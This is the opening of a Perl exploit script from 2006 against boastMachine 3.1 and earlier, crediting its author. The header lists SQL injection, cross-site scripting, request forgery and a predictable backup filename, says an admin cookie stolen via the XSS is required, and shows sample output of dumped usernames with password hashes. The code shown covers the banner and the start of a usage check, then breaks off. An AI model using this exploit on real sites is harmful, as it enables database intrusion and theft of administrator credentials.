|
#!/usr/bin/perl=0D
#=0D
# VulnScr: boastMachine version 3.1 and prior=0D
# Web: http://boastology.com/=0D
#=0D
# Date: Sun July 16 10:43 PM 2006=0D
# Credits: DarkFig (gmdarkfig@gmail.com)=0D
# Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Predictable Backup Filename=0D
# Advisory: http://www.acid-root.new.fr/advisories/boastmachine.txt (French)=0D
# Required: Admin cookie (user+hash) (You can have it with the XSS)=0D
#=0D
# +-------------------------------------------+=0D
# | boastMachine <= 3.1 SQL Injection Exploit |=0D
# +-------------------------------------------+=0D
# root::95f44e0321ed96ba9d2961a54daab05e=0D
# darkfig::547bbdedb2a1df8a1422b58e1eaa2111=0D
# dapowa::0b76dc1c5bb6c0267aa89fcea5f95bb6=0D
#=0D
use IO::Socket;=0D
=0D
print STDERR "+-------------------------------------------+\n";=0D
print STDERR "| boastMachine <= 3.1 SQL Injection Exploit |\n";=0D
print STDERR "+-------------------------------------------+\n";=0D
=0D
if(!$ARGV[3]) {=0D
print STDERR "| Usage: